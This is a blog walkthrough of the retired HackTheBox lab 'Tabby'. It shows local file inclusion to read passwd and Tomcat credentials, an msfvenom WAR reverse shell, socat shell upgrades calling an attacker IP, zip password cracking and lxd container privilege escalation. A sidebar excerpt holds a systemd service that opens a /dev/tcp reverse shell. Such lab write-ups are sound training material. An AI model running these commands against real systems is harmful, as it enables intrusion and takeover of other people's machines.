Skip to main content

Hackthebox.eu - Tabby -  Retired


Recon



I started with my basic start a quick up/down scan on all TCP ports then another scan with -A to run all the scripts against the found ports.


nmap -T4 -p- -oX ./nmapb.xml 10.10.10.194




Then converted that to HTML




Xslprotc ./nmapb.xml -o ./nmapb.html



Then I ran my second scan with just those ports


nmap -T4 -A -p22,80,4202,8080,15751,24329,28144,28244,32972,34303,41376,42494,55006,57000,60317,62669,62796,63622 -oX ./nmapf.xml 10.10.10.194 


Then converted it to html too


xsltproc ./nmapf.xml -o ./nmapf.html




Looks like we have openssh 8.2p1 on port 22 and apache 2.4.41 on port 80 and 8080


Let's browse to port 80 and see what we can see



Looks like a site for a hosting provider.  I generally just start by poking around the site following all the links to see if anything pops out.


Well, it just so happens when I went to the News link at the top it gave a 404 error because it was looking for megahosting.htb and not the IP address of the box



So I added that to my /etc/hosts and tried again.


Got a little blurb about a recent  data breach



But I also saw this in the url bar….


http://megahosting.htb/news.php?file=statement




file=statement huh???? Looks like we might have an opportunity for some LFI here.



Let's see if we can read the /etc/passwd file 



http://megahosting.htb/news.php?file=../../../../../../../etc/passwd



We sure can so we do have some lfi we can get to here.


Just glancing at the passwd file and it looks like have a user named ash on this system.



What about port 8080?



. Users are defined in /etc/tomcat9/tomcat-users.xml.?? With our LFI that sounds like maybe a good way to get some user/pass



I spent hours on this trying to find the actual location  of the tomcat-users.xml


Eventually I came across a utility called apt-file which will list the file apt-get install uses to install a software


I tried my LFI on that location


curl http://megahosting.htb/news.php?file=../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml



Looks like we might have creds.


user username="tomcat" password="$3cureP4s5w0rd123!"



Let's see if we can login to the manager now






Sure can we can now to try to get a shell





Exploit



Well bad news is we are part of the group

Manager-script and not manager-gui so we will need to use the "API" to try to get our shell


I found this blog which lays out the setup for creating a war file to upload to the server to get us a reverse shell. I had to modify it a bit to fit our needs here..


https://medium.com/@cyb0rgs/exploiting-apache-tomcat-manager-script-role-974e4307cd00



Step one. Create the malicious WAR (java) file to facilitate our reverse shell. For this we follow the blog exactly using msfvenom to generate our payload


msfvenom -p java/shell_reverse_tcp lhost=10.10.14.7 lport=5555 -f war -o shell.war


This next part the blog says  is to upload and deploy our application.


curl -v -u tomcat:$pass -- upload-file pwn.war "http://x.x.x.x:8080/manager/text/deploy?path=/foo&update=true"




I spent alot, and I mean a lot of time getting the syntax right on this to get this to work.


First problem is that our password starts with "$" which apparently when curl makes the base64 of the user/pass it strips the $ out. So we can't even authenticate they way they have set forth… but if we just don't supply the password only the user name it will prompt for the password and authenticate successfully



Eventually this is the command I got to work



Then we just need to setup our nc listener on our attacking box


Nc -lnvp 5555


And browse to


http://megahosting.htb:8080/shell


We got our shell, but its a crappy shell and I'm used to full TTY so I used SImpleHTTPServer to server socat over to the box and used


This in a new terminal on my attacking box


socat file:`tty`,raw,echo=0 tcp-listen:12345


Gave socat execute rights on tabby


Chmod +x ./socat


Then ran this from my crappy shell


./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.7:12345


And we get a full blown TTY shell back… .ahhhh much better



I started to poke around the /var/www folder to see if there would be anything to help get that ash user we found earlier.


And found what looks like a backup file




So I used my browser to download it to my attacking machine.


megahosting.htb/files/16162020_backup.zip


I opened it and saw it was password protected.


So I googled zip password crack kali and found this blog


https://thehacktoday.com/how-to-crack-a-password-protected-zip-files-using-kali-linux/



Which says this program named fcrackzip can brute force these passwords so I through rockout.txt at it and broke that password.


fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt /home/circusmonkey/Downloads/16162020_backup.zip 


PASSWORD FOUND!!!!: pw == admin@it



admin@it



I used that to extract the contents and there wasn't any other creds or anything that could help me out…



Now as soon as I got my TTY shell I tried to su as ash with the tomcat password we found and it didn't work but guess what? admin@it does




Grabbed the user.txt from /home/ash/




Now on to root!!!




Also in the /home folder for ash was this folder name snap and inside there was a folder named lxd


What is lxd?


Linux containers


https://linuxcontainers.org/lxd/introduction/


A quick google search for prive esc came back with this


https://www.hackingarticles.in/ai-web-2-vulnhub-walkthrough/


So we can make an image on our machine and xfer to tabby.


Then make it able to read all of the file system on tabby


This one took a bit as the poc script didn't work exactly like in the walkthrough so I had to enter to command manually


Here is the POC https://www.exploit-db.com/exploits/46978


So on my attacking machine I did the first two steps


Downloaded the build 

Then made the build


bash build-alpine


Which gave us this file


I used SimpleHTTPServer to copy it over to tabby. At first I tried the rest of the exploit in the tmp folder but it didn't work so I moved the file to ash's home folder.


lxc image import ./alpine-v3.12-x86_64-20200715_1645.tar.gz 

** i forgot the alias part here and had to add that in later.

lxc image alias create alpline 6c71d8381b08



lxd init --auto
lxc init alpline privesc -c security.privileged=true


lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc sh



Now we should be able to read the whole files system of tabby from the /mnt/root folder here in our newly created container.




And we got our flag!


































































Comments

Post a Comment

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more